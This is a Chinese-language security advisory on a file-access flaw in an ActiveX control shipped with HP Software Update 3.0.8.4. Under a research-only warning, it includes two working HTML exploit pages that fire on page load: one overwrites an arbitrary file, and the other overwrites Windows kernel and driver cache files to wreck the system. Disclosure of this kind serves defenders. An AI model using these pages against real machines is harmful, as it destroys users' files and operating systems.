发布日期：2007-12-19
更新日期：2007-12-21

受影响系统：

HP Software Update 3.0.8.4

描述：

---

BUGTRAQ  ID: 26950

HP Software Update是HP笔记本中默认安装的自动升级和补丁软件。

HP Software Updates所带的ActiveX控件实现上存在漏洞，远程攻击者可能利用此漏洞访问或破坏用户系统上的任意文件。

HP Software Updates所安装的RulesEngine.dll控件（CLSID：7CB9D4F5-C492-42A4-93B1-3F7D6946470D，默认路径C:\Program Files\Hewlett-Packard\eSupportDiags\RulesEngine.dll）没有正确地区分本地和全局数据文件区，LoadDataFromFile()和SaveDataToFile()方式都可以访问整个文件系统数据区，因此远程用户可以使用这些方式访问任意用户文件，或覆盖任意已有文件。

<*来源：porkythepig （porkythepig@anspi.pl）
  
  链接：http://secunia.com/advisories/28177/
        http://marc.info/?l=bugtraq&m=119809856929893&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

//////////////////////////////////////////
//Remote Arbitrary File Corruption Exploit
//////////////////////////////////////////

<html>
<head>
<script language="JavaScript">


var filePath="c:\\temp\\testfile.txt";

function spawn3()
{
    o2obj.SaveToFile(filePath);
}

</script>
</head>

<body onload="spawn3()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
   classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D"
</object>
</body>
</html>



////////////////////////////////
//Remote Kernel Wreckage Exploit
////////////////////////////////
//
//        
//  WARNING! THE REAL THING...
//  DON'T TRY THIS AT HOME!
//  THIS WILL DAMAGE YOUR
//  HP COMPUTER SYSTEM!!!
//
//
////////////////////////////////



<html>
<head>
<script language="JavaScript">

function spawn3()
{

    o2obj.EvaluateRules();

    o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntoskrnl.exe");
    o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrnlpa.exe");
    o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrnlmp.exe");
    o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrpamp.exe");

    o2obj.SaveToFile("c:\\WINDOWS\\system32\\ntoskrnl.exe");
    o2obj.SaveToFile("c:\\WINDOWS\\system32\\ntkrnlpa.exe");

    o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntoskrnl.exe");
    o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrnlpa.exe");
    o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrnlmp.exe");
    o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrpamp.exe");

    o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\sp2.cab");
    o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\driver.cab");
}


function meltdown()
{
    spawn3();
    spawn3();
    spawn3();
}

</script>
</head>

<body onload="meltdown()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
   classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D"
</object>
</body>
</html>

建议：

---

厂商补丁：

HP
--
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://itrc.hp.com

浏览次数：3152
严重程度：0（网友投票）